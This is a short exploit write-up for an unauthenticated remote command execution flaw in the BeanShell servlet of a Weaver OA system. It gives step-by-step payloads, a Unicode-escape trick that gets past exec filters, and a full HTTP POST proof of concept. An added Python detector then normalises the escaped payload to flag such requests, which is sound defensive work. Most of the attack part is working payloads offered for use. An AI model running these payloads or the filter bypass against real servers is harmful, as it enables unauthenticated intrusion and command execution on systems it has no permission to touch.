0x01 Visit the unauthenticated page
http://oa.xxxx.com/weaver/bsh.servlet.BshServlet
0x02 Enter the payload
exec("whoami");
Enter the command-execution function with the cmd command as its argument, then check the response to see whether the command was executed successfully.
0x03 Unicode-encode exec to bypass the exec filter that some sites apply
\u0065\u0078\u0065\u0063("whoami");
POC:
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Connection: close
Cookie: JSESSIONID=abca1it_jdsz2a73pnH1w; testBanCookie=test
Upgrade-Insecure-Requests: 1

bsh.script=ex\u0065c("whoami")
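As an added defender-side example (not from the original post), the following Python detector normalises Java \uXXXX escapes in the bsh.script parameter before matching, so the escaped variant from step 0x03 is flagged exactly like the plain exec call; the request text it inspects is constructed from the POC above with most headers trimmed.

```python
import re
from urllib.parse import unquote_plus

# Path of the unauthenticated BeanShell servlet described on the page.
BSH_PATH = "/weaver/bsh.servlet.BshServlet"

# Constructed sample request: the page's POC with the header block trimmed.
SAMPLE_REQUEST = (
    "POST /weaver/bsh.servlet.BshServlet HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "bsh.script=ex\\u0065c(\"whoami\")"
)


def decode_java_escapes(text: str) -> str:
    """Resolve \\uXXXX escapes the way the BeanShell lexer does, so that
    'ex\\u0065c' and 'exec' compare equal after normalisation."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), text)


def inspect_request(raw: str) -> dict:
    """Return a verdict for one raw HTTP request: whether it targets the
    BeanShell servlet and whether its bsh.script carries an exec() call,
    even when the call is hidden behind Unicode escapes."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    params = dict(kv.split("=", 1) for kv in body.split("&") if "=" in kv)
    raw_script = unquote_plus(params.get("bsh.script", ""))
    script = decode_java_escapes(raw_script)
    hits_exec = re.search(r"\bexec\s*\(", script) is not None
    return {
        "bsh_servlet": path == BSH_PATH,
        "script": script,               # normalised script text
        "exec_call": hits_exec,
        "obfuscated": "\\u" in raw_script,  # escapes were used to hide it
        "alert": path == BSH_PATH and hits_exec,
    }


if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
```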